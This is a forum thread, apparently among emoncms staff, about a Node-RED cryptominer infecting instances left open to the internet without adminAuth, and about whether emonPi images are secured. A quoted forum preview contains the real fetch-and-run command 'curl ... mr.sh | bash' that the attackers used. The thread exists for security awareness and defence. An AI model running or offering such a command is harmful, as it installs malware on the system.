node-RED virus >> emoncms image file

Paul · 2018-09-26T13:10:53.136Z

Hi all. I’ve pinned the post about the node-RED virus issue until Monday, I hope that’s OK.

It is affecting quite a number of systems, and the node-RED authors are recommending that any infected system should be completely wiped, as the virus is pretty much free (having root access) to install or do whatever it wants.

I think it’s important that emoncms users are aware, because not only has node-RED been bundled into the OS which is most popular with emoncms, but many users are using it as integration with emoncms, which of course would also need to be wiped if infected.

It’s hard to believe that users actually expose their system to the web without even considering the most basic password protection, but there we go, they’ll learn the hard way

Paul · 2018-09-26T13:16:26.291Z

Just wondered… does the emoncms image file have node-RED adminAuth setup by default?

TrystanLea · 2018-09-26T15:38:17.530Z

Thanks Paul, I will ask @glyn.hudson about this

glyn.hudson · 2018-09-26T20:52:11.144Z

Hi @Paul, Thanks for bringing this to our attention. I’m currently reading all the threads on the nodered forums regarding the issue. Is this the issue you are talking about:

Node-RED Forum – 25 Sep 18

Have I got a virus in Node-red?

General

Hi, I get alot of new tabs, with 3 things in them. Timestamp, exec and msg.payload All new tabs look the same. The exce node has this in it: "curl -s http://192.99.142.226:8220/mr.sh | bash -sh" Which seem to be a cryptominig crap... (I found...

Node-RED Forum – 25 Sep 18

Missing and mysterious new flows

General

When I just logged into my node-red server, some of my flows are missing and I see a ton of new random flows that that all look like the below. Any idea what's going on here?

Reading time: 2 mins 🕑 Likes: 2 ❤

Node-RED Forum – 23 Sep 18

Crypto Miner Abuse/Malware

General

security

Just thought I'd share a little experience I had yesterday regarding a Crypto Miner I discovered inside my Node-Red. I have Node-Red in a Docker Container and noticed my server CPU usage spiked to nearly 100% full-time. Upon researching the...

Reading time: 3 mins 🕑 Likes: 11 ❤

Paul:

Just wondered… does the emoncms image file have node-RED adminAuth setup by default?

Yes, every single emonPi / emonBase / emonSD with nodered is secured with an adminAuth username / password.

From my understanding it seems that the malware has only affected systems open to the internet without secure admin access. By default emonPi / emonBase systems should not have the nodered port open to the internet, if a users chooses to open their nodered system to the internet we have always strongly recommend they change the default password.

I’ve just scanned all the nodred installations that I have access (all have adminauth) to and have not been able to find any infections.

With this in mind, I guess we should be ‘ok’ and no further action is needed other than to make users aware of the importance of changing the emonPi default nodered password, if they choose to open their nodered port to the world. Do you agree?

Would you mind if I made this thread public?

Paul · 2018-09-26T21:23:32.927Z

glyn.hudson:

With this in mind, I guess we should be ‘ok’ and no further action is needed other than to make users aware of the importance of changing the emonPi default nodered password, if they choose to open their nodered port to the world. Do you agree?

Yes, I’m not aware of any cases where the virus has breached the adminAuth security, so a password change should suffice.
See Nick O’Leary’s summary.

glyn.hudson:

Would you mind if I made this thread public?

Not at all. I only posted this in the Staff section to avoid publically highlighting potential exploit with the emoncms image file, until we had time to fully assess - which has been done.

Paul